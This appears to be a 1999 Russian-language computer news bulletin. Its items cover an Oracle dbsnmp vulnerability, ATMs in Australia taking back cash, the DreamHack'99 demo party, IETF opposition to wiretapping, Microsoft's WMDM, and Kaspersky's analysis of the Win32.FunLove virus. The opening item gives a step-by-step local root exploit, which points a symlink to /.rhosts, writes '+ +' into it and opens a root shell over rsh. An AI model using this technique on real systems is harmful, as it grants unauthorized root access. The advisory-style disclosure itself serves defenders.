Утилита
dbsnmp (suid root) при отсутствии
переменной ORACLE_HOME создает dump-file с
именем dbsnmpc.log не контролируя символьных
линков и давая права заданные umask текущего
пользователя на доступ к нему, что позволяет
любому пользователю переписать содержимое
любого
файла.
Например:
cd /tmp
unset ORACLE_HOME
umask 0000
ln -s /.rhosts /tmp/dbsnmpc.log
/u01/app/oracle/product/8.1.5/bin/dbsnmp
echo "+ +" > /.rhosts
rsh -l root localhost 'sh -i'
для получения root shell...
Кредитную
карточку может использовать не столько богатый,
сколько проворный гражданин. По крайней мере, в
Австралии как свидетельствует местный
потребительский журнал "Choice". Если клиент
замешкался и не успел взять только что выданные
деньги, банкоматы их "проглатывают". Так они
устроены в целях безопасности.
Большинство банкоматов
в Австралии прячут наличность, если вы не успели
забрать ее в течение определенного времени
иногда менее двадцати секунд. Так случилось с
одной из жительниц пока она копалась в
кошельке, банкомат успел не только выдать ей
деньги, но и забрать их обратно. А если банкомат
проглотил купюры обратно, это еще не значит, что
они автоматически вернулись на ваш счет.
Приходится обращаться в банк, чтобы поместить
эту сумму вновь на свой счет. Восстанавливаются
деньги довольно долго до 45 дней.
БЮЛЛЕТЕНЬ
ИнАП
DreamHack'99
Закончилась
DreamHack'99 demo
party (Швеция, 4-7 ноября). На party присутствовало около
3000 человек, причем (и об этом организаторы
заявляют с гордостью) из них 530 - девушки.
Возникает законный вопрос - чем их туда заманили?
:)
Первые места в некоторых номинациях:
PC Demo compo: Off by Doomsday
PC Intro: Goatzilla by Noice
Amiga demo: Myster & Tremor by Embassy
Amiga intro: Electra by Darkage
Internet-стандарты не признают "подслушивания",
но не всем это нравится
[news.cnet.com]
Стандарты сети Internet отвергают саму идею
перехвата информации, передаваемой по сети.
Участники совещания Рабочей группы по
инженерным проблемам Internet (Internet Engineering Task Force, IETF)
договорились о недопустимости наличия в
Internet-стандартах возможностей для перехвата
сообщений любыми правительственными
организациями, желающими "прослушивать"
онлайновые коммуникации.
На совещании IETF
дебатировался вопрос о том, может ли федеральный
закон США, требующий от телефонной
инфраструктуры поддержки функций прослушивания
переговоров правоохранительными органами, быть
применен и к Internet-телефонии.
Основным возражением
против прослушивания было то, что наличие таких
возможностей на уровне стандартов делает
системы связи менее защищенными. Такие системы
связи будут более уязвимы для различного рода
незаконных вторжений, они не будут обеспечивать
защиту частной информации пользователей и
ограничат возможности внедрения новейших
достижений в области телекоммуникаций. Кроме
того, обеспечение возможностей прослушивания
увеличит стоимость создания систем связи, и эти
затраты будут неизбежно заложены в стоимость
услуг связи для конечных пользователей. Во
всяком случае, пока IETF не собирается закладывать
в Internet-протоколы такие функции.
Известно, что во
многих странах (и в России тоже) соответствующие
правительственные организации требуют от
телефонных компаний такой организации своих
сетей, которая облегчила бы полиции
прослушивание телефонных переговоров. С
появлением Internet-телефонии, работающей по
протоколу IP, ФБР обнаружило новую для себя угрозу
и обратилось в IETF с просьбой рассмотреть
введение аналогичных мер для облегчения надзора
за гражданами и в Internet.
Microsoft поможет разработчикам защитить цифровые
аудиозаписи
[Newsbytes]
Корпорация Microsoft представила технологию,
которая, по ее заявлению, упростит для
разработчиков создание Windows-приложений для
цифровых музыкальных устройств, защищенных от
посягательств пиратов от музыки.
Технология называется
Windows Media Device Manager (WMDM). По заявлению Microsoft, она
позволит ускорить выпуск продуктов,
обеспечивающих защиту авторских прав на
музыкальные записи. Эта технология предлагает
стандартный способ преобразования защищенных
авторскими правами MP3- или WMA-файлов для записи на
портативные носители типа карт флэш-памяти. В WMDM
включена также поддержка систем, контролирующих
распространение через Internet информации,
защищенной авторскими правами.
Напомним, что Microsoft
выпустила свой формат для музыкальных записей WMA
в августе этого года как альтернативу для MP3. И
вскоре после выпуска хакеры успешно взломали его
систему защиты.
"Лаборатория Касперского" о новом вирусе
Win32.FunLove
Мы уже
сообщали сегодня о появлении вируса FunLove. Теперь
предлагаем вашему вниманию подробное описание
этого вируса от известного российского
разработчика антивирусных систем безопасности
компании "Лаборатория Касперского".
Вирус Win32.FunLove
обнаружен
в "диком виде" (In-the-Wild), т.е. для компьютерных
пользователей существует реальная опасность
заражения данным вирусом.
Win32.FunLove является
неопасным резидентным паразитическим Win32
вирусом. Он заражает PE (Portable Executable) файлы на
локальных и сетевых дисках. Благодаря своей
способности размножаться по локальной сети
вирус может заразить всю корпоративную сеть с
одной рабочей станции, если ей предоставлены
права записи на сетевые диски.
Файлы, зараженные
вирусом Win32.FunLove, можно легко распознать по строке
(название популярной западной рок-группы),
содержащейся в его теле: "Fun Loving Criminal".
После запуска
зараженного файла, вирус создает в системной
директории Windows файл FLCSS.EXE ("Дроппер"), в
который записывает свой "чистый" код, и
затем запускает его на выполнение. "Дроппер"
вируса является обычным файлом формата Win32 PE. Под
операционными системами Windows 95 и Windows 98 он
запускается в качестве скрытого (hidden) Windows
приложения, а под Windows NT - как сервис. После этого
активизируется процедура заражения системы.
В случае возникновения
ошибки в процессе создания "дроппера" для
заражения системы, вирус все равно запускает эту
процедуру заражения, но уже непосредственно из
своего тела, а не через "дроппер". Процесс
поиска и заражения файлов происходит в фоновом
режиме (thread), в результате чего уже зараженные
файлы выполняются без заметных задержек.
В процессе заражения
системы вирус сканирует все локальные диски от C:
до Z:, затем просматривает дерево директорий
сетевых ресурсов и заражает все PE файлы с
расширениями .OCX, .SCR и .EXE. Вирус записывает свой
код в последнюю секцию файла (увеличивая тем
самым размер файла на 4099 байтов) и добавляет в
стартовый адрес инструкцию "JumpVirus". Данная
инструкция обеспечивает запуск вируса из
последней секции файла перед выполнением самой
программы.
Вирус проверяет имена
файлов и не заражает файлы по следующим маскам:
ALER*, AMON*, _AVP*, AVP3*, AVPM*, F-PR*, NAVW*, SCAN*, SMSS*, DDHE*,
DPLA*, MPLA*.
Вирус имеет черты
семейства вирусов {"Bolzano":Win32_Bolzano}. Он
изменяет файлы NTLDR и WINNT\System32\ntoskrnl.exe тем же самым
способом, что и вирус "Bolzano". Измененные
файлы можно восстановить из резервной копии.
Процедуры обнаружения
и удаления вируса Win32.FunLove содержатся во
внеочередном обновлении антивирусных баз AntiViral
Toolkit Pro (AVP) и доступны на сайте "Лаборатории
Касперского" по адресу http://www.avp.ru.